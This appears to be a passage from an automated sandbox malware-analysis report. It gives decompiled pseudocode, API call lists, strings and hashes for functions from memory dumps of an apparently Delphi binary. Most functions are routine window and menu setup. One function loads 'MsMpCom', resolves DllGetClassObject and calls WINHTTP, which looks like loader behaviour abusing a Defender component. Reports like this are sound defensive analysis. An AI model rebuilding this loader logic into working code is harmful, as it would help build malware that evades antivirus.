Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterReleaseSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 268368413-1126952177
Opcode ID: 1f2b309a31cb3f4ae20db62dec42fa67b9ea24cf31a5b8eaf59f2768227541fa
Instruction ID: 91f70a053084b38ab58791255055730202a39e90db144da4f483ee372be90f07
Opcode Fuzzy Hash: 1f2b309a31cb3f4ae20db62dec42fa67b9ea24cf31a5b8eaf59f2768227541fa
Instruction Fuzzy Hash: 0C413EB06002099FCB00EFB5D982A9D77B5EB49309B51457BE905E7292E7786904CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 0044A548, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 134
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0044A548(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x44a709);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00443A9C != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00443A9C;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040E138(_t94, _t95, _t109, _t111);
						}
					}
					 *0x4a0ce8 = _t111;
					_t96 =  *_t111; // executed
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040E138(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E004096E4( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E0044D8A0(_t111);
					E00447F3C(_t111, E004284A4( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E00403814(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x44a710);
					return E004043D8( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x4bb0a8; // 0x42641c
						E0040656C(_t86, _t95,  &_v196);
						_t95 = _v196;
						E0040CB00(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E00403DEC();
					} else {
						_t108 =  *0x442c24; // 0x442c70
						if(E004037A4(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E0044D590(_t94);
					}
					goto L7;
				}
			}

0x0044a548
0x0044a548
0x0044a551
0x0044a555
0x0044a55b
0x0044a55f
0x0044a560
0x0044a565
0x0044a568
0x0044a573
0x0044a575
0x0044a57f
0x0044a5f4
0x0044a5f7
0x0044a60c
0x0044a614
0x0044a616
0x0044a619
0x0044a62a
0x0044a634
0x0044a634
0x0044a639
0x0044a643
0x0044a652
0x0044a654
0x0044a654
0x0044a652
0x0044a659
0x0044a667
0x0044a669
0x0044a676
0x0044a678
0x0044a678
0x0044a690
0x0044a6ae
0x0044a6ae
0x0044a6b6
0x0044a6bd
0x0044a6c2
0x0044a6da
0x0044a6df
0x0044a6e3
0x0044a6eb
0x0044a6eb
0x0044a6f2
0x0044a6f5
0x0044a6f8
0x0044a708
0x0044a58a
0x0044a58a
0x0044a58f
0x0044a5b4
0x0044a5b7
0x0044a5bd
0x0044a5d3
0x0044a5d8
0x0044a5dd
0x0044a5ea
0x0044a5ef
0x0044a597
0x0044a599
0x0044a5a6
0x00000000
0x00000000
0x0044a5af
0x0044a5af
0x00000000
0x0044a58f

APIs

GetClassInfoA.USER32(?,?,?), ref: 0044A60C
UnregisterClassA.USER32(?,?), ref: 0044A634
RegisterClassA.USER32(?), ref: 0044A64A
GetWindowLongA.USER32(00000000,000000F0), ref: 0044A686
GetWindowLongA.USER32(00000000,000000F4), ref: 0044A69B
SetWindowLongA.USER32 ref: 0044A6AE

Strings

@, xrefs: 0044A581
p,D, xrefs: 0044A599

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister
String ID: @$p,D
API String ID: 717780171-2918191434
Opcode ID: 114ea97c141a6a042801ddeb092bb41519737ce8875b8c03052e97bdecaade63
Instruction ID: 894eacb346fbdc7464903da9b9a0bb3069fa36e87940c204af087bc266b3aed2
Opcode Fuzzy Hash: 114ea97c141a6a042801ddeb092bb41519737ce8875b8c03052e97bdecaade63
Instruction Fuzzy Hash: 4B518271A043549BEB20EF69CC41B9EB7F8AF04308F1445AAF845E7392DB38AD45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00465DFC, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 130
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00465DFC(void* __ecx, char __edx) {
				char _v5;
				char* _v12;
				char _v268;
				void* __ebx;
				void* __ebp;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t48;
				struct HINSTANCE__** _t58;
				intOrPtr _t63;
				struct HINSTANCE__** _t65;
				char* _t80;
				intOrPtr _t86;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr _t96;
				void* _t97;
				char _t99;
				void* _t111;
				void* _t112;

				_t99 = __edx;
				_t97 = __ecx;
				if(__edx != 0) {
					_t112 = _t112 + 0xfffffff0;
					_t44 = E00403984(_t44, _t111);
				}
				_v5 = _t99;
				_t96 = _t44;
				E00424FB8(_t97, 0);
				_t47 =  *0x4baf7c; // 0x4a05ac
				if( *((short*)(_t47 + 2)) == 0) {
					_t95 =  *0x4baf7c; // 0x4a05ac
					 *((intOrPtr*)(_t95 + 4)) = _t96;
					 *_t95 = 0x46750c;
				}
				_t48 =  *0x4bb070; // 0x4a05b4
				if( *((short*)(_t48 + 2)) == 0) {
					_t94 =  *0x4bb070; // 0x4a05b4
					 *((intOrPtr*)(_t94 + 4)) = _t96;
					 *_t94 = E00467704;
				}
				 *((char*)(_t96 + 0x34)) = 0;
				 *((intOrPtr*)(_t96 + 0x90)) = E004035DC(1);
				 *((intOrPtr*)(_t96 + 0xa8)) = E004035DC(1);
				 *((intOrPtr*)(_t96 + 0x60)) = 0;
				 *((intOrPtr*)(_t96 + 0x84)) = 0;
				 *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t96 + 0x78)) = 0x1f4;
				 *((char*)(_t96 + 0x7c)) = 1;
				 *((intOrPtr*)(_t96 + 0x80)) = 0;
				 *((intOrPtr*)(_t96 + 0x74)) = 0x9c4;
				 *((char*)(_t96 + 0x88)) = 0;
				 *((char*)(_t96 + 0x9d)) = 1;
				 *((char*)(_t96 + 0xb4)) = 1;
				 *((intOrPtr*)(_t96 + 0x98)) = E0042EE88(1);
				_t58 =  *0x4bae44; // 0x4bc030
				E0042F258(_t57, LoadIconA( *_t58, "MAINICON"));
				_t20 = _t96 + 0x98; // 0x736d
				_t63 =  *_t20;
				 *((intOrPtr*)(_t63 + 0x14)) = _t96;
				 *((intOrPtr*)(_t63 + 0x10)) = 0x467d54;
				_t65 =  *0x4bae44; // 0x4bc030
				GetModuleFileNameA( *_t65,  &_v268, 0x100);
				OemToCharA( &_v268,  &_v268);
				_v12 = E0040D990( &_v268, _t97, 0x5c);
				if(_v12 != 0) {
					E004094A8( &_v268, _v12 + 1);
				}
				_v12 = E0040D9D8( &_v268, _t97, 0x2e);
				if(_v12 != 0) {
					 *_v12 = 0;
				}
				CharLowerA(CharNextA( &_v268));
				_t36 = _t96 + 0x8c; // 0x45e140
				E00404648(_t36, 0x100,  &_v268);
				_t80 =  *0x4bac9c; // 0x4bc038
				if( *_t80 == 0) {
					E00466118(_t96, _t96, 0x100); // executed
				}
				 *((char*)(_t96 + 0x59)) = 1;
				 *((char*)(_t96 + 0x5a)) = 1;
				 *((char*)(_t96 + 0x5b)) = 1;
				 *((char*)(_t96 + 0x9e)) = 1;
				 *((intOrPtr*)(_t96 + 0xa0)) = 0;
				E00467F30(_t96, 0x100);
				E00468918(_t96);
				_t86 = _t96;
				if(_v5 != 0) {
					E004039DC(_t86);
					_pop( *[fs:0x0]);
				}
				return _t96;
			}

0x00465dfc
0x00465dfc
0x00465e09
0x00465e0b
0x00465e0e
0x00465e0e
0x00465e13
0x00465e16
0x00465e1c
0x00465e21
0x00465e2b
0x00465e2d
0x00465e32
0x00465e35
0x00465e35
0x00465e3b
0x00465e45
0x00465e47
0x00465e4c
0x00465e4f
0x00465e4f
0x00465e55
0x00465e65
0x00465e77
0x00465e7f
0x00465e84
0x00465e8a
0x00465e91
0x00465e98
0x00465e9e
0x00465ea4
0x00465eab
0x00465eb2
0x00465eb9
0x00465ece
0x00465ed9
0x00465eea
0x00465eef
0x00465eef
0x00465ef5
0x00465ef8
0x00465f0b
0x00465f13
0x00465f26
0x00465f38
0x00465f3f
0x00465f4b
0x00465f4b
0x00465f5d
0x00465f64
0x00465f69
0x00465f69
0x00465f79
0x00465f7e
0x00465f8f
0x00465f94
0x00465f9c
0x00465fa0
0x00465fa0
0x00465fa5
0x00465fa9
0x00465fad
0x00465fb1
0x00465fba
0x00465fc2
0x00465fc9
0x00465fce
0x00465fd4
0x00465fd6
0x00465fdb
0x00465fe2
0x00465fec

APIs

LoadIconA.USER32 ref: 00465EE1
GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00452518,00000000,00000000,?,?,00000000,00452580), ref: 00465F13
OemToCharA.USER32 ref: 00465F26
CharNextA.USER32(?), ref: 00465F73
CharLowerA.USER32 ref: 00465F79

Strings

MAINICON, xrefs: 00465ED4
PvB, xrefs: 00465EC2

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$FileIconLoadLowerModuleNameNext
String ID: MAINICON$PvB
API String ID: 3256280155-1317487111
Opcode ID: ed063bfdf8bd201a24e0adf7ee449aa88e7f5230faca0e6a04a106bd78ad6817
Instruction ID: fbcd5f350cf006d78cb94b64e2a8b9aba4bce68d871928c9f442a7a90706e942
Opcode Fuzzy Hash: ed063bfdf8bd201a24e0adf7ee449aa88e7f5230faca0e6a04a106bd78ad6817
Instruction Fuzzy Hash: 0B51B370A042448FDB40DF39C8857C97BE4AB15308F4440FAE848DF357DBB99988CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0049E918, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0049E918(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _t61;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t86;
				intOrPtr _t88;
				signed int _t92;
				intOrPtr _t98;
				void* _t101;
				intOrPtr _t135;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t155;

				_t152 = __esi;
				_t100 = __ebx;
				_t154 = _t155;
				_t101 = 8;
				do {
					_push(0);
					_push(0);
					_t101 = _t101 - 1;
				} while (_t101 != 0);
				_push(_t154);
				_push(0x49eb7d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t155;
				0;
				0;
				0;
				E0049DED8(4, 5);
				E0049E598(0x64);
				_t157 =  *0x4bccd4 - 0x87a68e;
				if( *0x4bccd4 <= 0x87a68e) {
					0;
					0;
					E0040442C(0x4bcd38, 0x49eb90);
					E0049E4F4("MsMpCom", __ebx, 0x4bcccc, "DllGetClassObject", __esi); // executed
					E0049DE48(0x49ebc8, __ebx,  &_v36, 0, __esi, __eflags);
					E0049DE48(0x49ebd4, __ebx,  &_v32, _v36, __esi, __eflags);
					E0049DE48(0x49ebe0, _t100,  &_v28, _v32, _t152, __eflags);
					E0049DE48(0x49ebec, _t100,  &_v24, _v28, _t152, __eflags);
					E0049DE48(0x49ebf8, _t100,  &_v20, _v24, _t152, __eflags);
					E0049DE48(0x49ec04, _t100,  &_v16, _v20, _t152, __eflags);
					E0049DE48(0x49ebf8, _t100,  &_v12, _v16, _t152, __eflags);
					E0049DE48(0x49ec10, _t100,  &_v8, _v12, _t152, __eflags);
					E0049E4F4(_v8, _t100, 0x4bcccc, "DllGetClassObject", _t152); // executed
					__eflags =  *0x4bccd4 - 4;
					if(__eflags > 0) {
						L6:
						0;
						_t61 =  *0x4bcce4; // 0x0
						_push(E00408EB4(_t61, __eflags));
						L0049DE38();
					} else {
						__eflags = 0;
						E0049DE48(0x49ec1c, _t100,  &_v44, 0, _t152, 0);
						E0049DE48(0x49ec1c, _t100,  &_v40, _v44, _t152, __eflags);
						_t70 =  *0x4bcce4; // 0x0
						E004047E4(_t70, _v40);
						if(__eflags != 0) {
							_t72 =  *0x4bcccc; // 0x0
							E0049E8CC(_t72,  &_v40, 0x4bcdc0);
							 *0x4bcce8 = E0042D2EC(1);
							__eflags = 0;
							E0049DE48(0x49ec28, _t100,  &_v64, 0, _t152, 0);
							E0049DE48(0x49ec34, _t100,  &_v60, _v64, _t152, __eflags);
							E0049DE48(0x49ec40, _t100,  &_v56, _v60, _t152, __eflags);
							E0049DE48(0x49ec4c, _t100,  &_v52, _v56, _t152, __eflags);
							E0049DE48(0x49ec4c, _t100,  &_v48, _v52, _t152, __eflags);
							_t147 =  *0x4bc668; // 0x400000
							_t86 =  *0x4bcce8; // 0x1c42718
							E0042DDC8(_t86, _t100, _t147, __edi, _t152, __eflags);
							_t88 =  *0x4bcce8; // 0x1c42718
							E0049E67C(_t88,  &_v68, __eflags);
							E0040442C(0x4bcd38, _v68);
							_t92 =  *0x4bcd38; // 0x1c4cb04
							E0049DA04(_t92, _t100, _v48, __edi, _t152);
							E00402D04(0x4a1484, 1, E004048F0(0x4bcd5c));
						} else {
							goto L6;
						}
					}
				} else {
					0;
					0;
					_t98 =  *0x4bcce4; // 0x0
					_push(E00408EB4(_t98, _t157));
					L0049DE40();
				}
				_pop(_t135);
				 *[fs:eax] = _t135;
				_push(0x49eb84);
				return E004043FC( &_v68, 0x10);
			}

0x0049e918
0x0049e918
0x0049e919
0x0049e91b
0x0049e920
0x0049e920
0x0049e922
0x0049e924
0x0049e924
0x0049e929
0x0049e92a
0x0049e92f
0x0049e932
0x0049e93b
0x0049e93f
0x0049e943
0x0049e94f
0x0049e959
0x0049e95e
0x0049e968
0x0049e990
0x0049e994
0x0049e9a0
0x0049e9b4
0x0049e9c3
0x0049e9d3
0x0049e9e3
0x0049e9f3
0x0049ea03
0x0049ea13
0x0049ea23
0x0049ea33
0x0049ea45
0x0049ea4a
0x0049ea51
0x0049ea87
0x0049ea87
0x0049ea8b
0x0049ea95
0x0049ea96
0x0049ea53
0x0049ea56
0x0049ea5d
0x0049ea6d
0x0049ea75
0x0049ea7a
0x0049ea7f
0x0049eaa6
0x0049eaab
0x0049eabc
0x0049eac4
0x0049eacb
0x0049eadb
0x0049eaeb
0x0049eafb
0x0049eb0b
0x0049eb13
0x0049eb19
0x0049eb1e
0x0049eb26
0x0049eb2b
0x0049eb38
0x0049eb3d
0x0049eb42
0x0049eb5d
0x00000000
0x00000000
0x00000000
0x0049ea7f
0x0049e970
0x0049e970
0x0049e974
0x0049e975
0x0049e97f
0x0049e980
0x0049e980
0x0049eb64
0x0049eb67
0x0049eb6a
0x0049eb7c

APIs

6DAC1E03.MF(00000000,00000000,0049EB7D,?,00000000,00000000), ref: 0049E980

Part of subcall function 0049E4F4: LoadLibraryA.KERNEL32(00000000), ref: 0049E532
Part of subcall function 0049E4F4: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0049E589), ref: 0049E53A
Part of subcall function 0049E4F4: GetProcAddress.KERNEL32(70600000,00000000,00000000,00000000,00000000,0049E589), ref: 0049E567

706E3434.WINHTTP(00000000,00000000,0049EB7D,?,00000000,00000000), ref: 0049EA96

Strings

DllGetClassObject, xrefs: 0049E9AA, 0049EA40
MsMpCom, xrefs: 0049E9AF
RTOVRLTGJQTCDKSLFTUWQKLRRUTLRTLSIDQBPLOYUDNVLFAXKNFUVJWPSTDCPITORKIVJMAZVPGRMTEXGVFTLSKSBFUEOCUFHMBJPIQGZPMOPXYCKQVEVCNDCMRSCOEEPAYXTDLOBXZXGKHKQUXSXUJUSIAGDJQKAMAXVSEPKOZZCDEENWCDIPQQERLASAXFYADZQIZZWXYNBWSERDYINTQLHSTYADXFQPYVRTTDQNQZGOBMPRTOVRLTGJQTCDKSLFTU, xrefs: 0049EB53

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressE3434HandleLibraryLoadModuleProc
String ID: DllGetClassObject$MsMpCom$RTOVRLTGJQTCDKSLFTUWQKLRRUTLRTLSIDQBPLOYUDNVLFAXKNFUVJWPSTDCPITORKIVJMAZVPGRMTEXGVFTLSKSBFUEOCUFHMBJPIQGZPMOPXYCKQVEVCNDCMRSCOEEPAYXTDLOBXZXGKHKQUXSXUJUSIAGDJQKAMAXVSEPKOZZCDEENWCDIPQQERLASAXFYADZQIZZWXYNBWSERDYINTQLHSTYADXFQPYVRTTDQNQZGOBMPRTOVRLTGJQTCDKSLFTU
API String ID: 58649982-2623530818
Opcode ID: a0efa33bc577e04e83678bcbe7b09e1bd558a321a04c4056c38e9b2e4590ea8a
Instruction ID: 990c060cecdcbde1e60e902d0f133ebbe8d53669c78b51cb49a40539e04bd0b2
Opcode Fuzzy Hash: a0efa33bc577e04e83678bcbe7b09e1bd558a321a04c4056c38e9b2e4590ea8a
Instruction Fuzzy Hash: 2B514334A005099BCF04EBAAD4C199E7F71EB99308F50853BF501AB351DE3CAD068B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004616BC, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004616BC(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t97;
				void* _t110;
				intOrPtr _t112;
				void* _t115;

				_t93 = 0;
				_v20 = 0;
				_t112 = __edx;
				_t92 = __eax;
				_push(_t115);
				_push(0x461882);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0045B168(_t39, 0, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t112 != 0 && ( *(_t112 + 0x1c) & 0x00000008) != 0) {
						_t112 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t112;
					if(_t112 != 0) {
						E00425088(_t112, _t92);
					}
					if(_t112 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0044D894(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0044D590(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0044D894(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0044D590(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0044D894(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t64 = GetMenu(E0044D590(_t92));
								_t137 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0044D590(_t92), _t70); // executed
								}
								E0045B168(_t112, E0044D590(_t92), _t137);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00462788(_t92, 1);
							}
							E004615F4(_t92);
							_pop(_t97);
							 *[fs:eax] = _t97;
							_push(0x461889);
							return E004043D8( &_v20);
						}
					}
				}
				_t77 =  *0x4bcb80; // 0x1c40e90
				_t79 = E00464EF0(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t110 = 0;
					do {
						_t81 =  *0x4bcb80; // 0x1c40e90
						if(_t112 ==  *((intOrPtr*)(E00464EDC(_t81, _t110) + 0x248))) {
							_t83 =  *0x4bcb80; // 0x1c40e90
							if(_t92 != E00464EDC(_t83, _t110)) {
								_v16 =  *((intOrPtr*)(_t112 + 8));
								_v12 = 0xb;
								_t87 =  *0x4bade4; // 0x42663c
								E0040656C(_t87, _t93,  &_v20);
								_t93 = _v20;
								E0040CB00(_t92, _v20, 1, _t110, _t112, 0,  &_v16);
								E00403DEC();
							}
						}
						_t110 = _t110 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}

0x004616c5
0x004616c7
0x004616ca
0x004616cc
0x004616d0
0x004616d1
0x004616d6
0x004616d9
0x004616de
0x00461750
0x00461750
0x00461758
0x0046175c
0x0046175c
0x00461765
0x00461771
0x00461771
0x00461773
0x0046177b
0x00461781
0x00461781
0x00461788
0x0046183b
0x00461840
0x00461842
0x0046184e
0x0046184e
0x00000000
0x004617a1
0x004617ab
0x004617ba
0x00461814
0x0046181b
0x0046181f
0x00461824
0x00461826
0x00461832
0x00461832
0x00461826
0x00000000
0x0046181b
0x00000000
0x004617bc
0x004617bc
0x004617c5
0x004617d3
0x004617e0
0x004617e5
0x004617e7
0x004617f1
0x004617fd
0x004617fd
0x0046180d
0x0046180d
0x00461853
0x0046185a
0x00461860
0x00461860
0x00461867
0x0046186e
0x00461871
0x00461874
0x00461881
0x00461881
0x004617ab
0x00461788
0x004616e0
0x004616ea
0x004616ed
0x004616f0
0x004616f3
0x004616f5
0x004616f7
0x00461707
0x0046170b
0x00461717
0x0046171c
0x0046171f
0x0046172c
0x00461731
0x00461736
0x00461740
0x00461745
0x00461745
0x00461717
0x0046174a
0x0046174b
0x0046174b
0x0046174b
0x004616f5

APIs

GetMenu.USER32 ref: 004617E0
SetMenu.USER32 ref: 004617FD
SetMenu.USER32 ref: 00461832
SetMenu.USER32 ref: 0046184E

Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E

Strings

<fB, xrefs: 0046172C

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadString
String ID: <fB
API String ID: 3688185913-2034575739
Opcode ID: aa6f627a01b7cbee9e5e067dd656252ef2fe770bb74a164e345a9a1e29d40d0c
Instruction ID: 6bf96854945917256a8ccdf68c0af53f171b62af739f0e36b70eecfbd3614060
Opcode Fuzzy Hash: aa6f627a01b7cbee9e5e067dd656252ef2fe770bb74a164e345a9a1e29d40d0c
Instruction Fuzzy Hash: CE519A30A042405BDB60FF7AD88575A77A5AF44348F0845BBEC059B3A7EA7CDC44879E

Uniqueness

Uniqueness Score: -1.00%

Function 00426168, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00426168(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HWND__* _t15;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x4bc668; // 0x400000
				 *0x4a05e8 = _t6;
				_t8 =  *0x4a05fc; // 0x426158
				_t9 =  *0x4bc668; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L0040703C != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x4bc668; // 0x400000
						_t20 =  *0x4a05fc; // 0x426158
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x4a05d8);
				}
				_t13 =  *0x4bc668; // 0x400000
				_t24 =  *0x4a05fc; // 0x426158
				_t15 = E004075CC(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
				_t22 = _t15;
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E00426074(_a4, _a8));
				}
				return _t22;
			}

0x0042616f
0x00426174
0x0042617d
0x00426183
0x00426189
0x00426191
0x00426193
0x00426196
0x004261a4
0x004261a6
0x004261ac
0x004261b2
0x004261b2
0x004261bc
0x004261bc
0x004261d2
0x004261df
0x004261ea
0x004261ef
0x004261f6
0x00426207
0x00426207
0x00426212

APIs

GetClassInfoA.USER32(00400000,00426158,?), ref: 00426189
UnregisterClassA.USER32(00426158,00400000), ref: 004261B2
RegisterClassA.USER32(004A05D8), ref: 004261BC
SetWindowLongA.USER32 ref: 00426207

Strings

XaB, xrefs: 0042617D, 004261AC, 004261DF

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
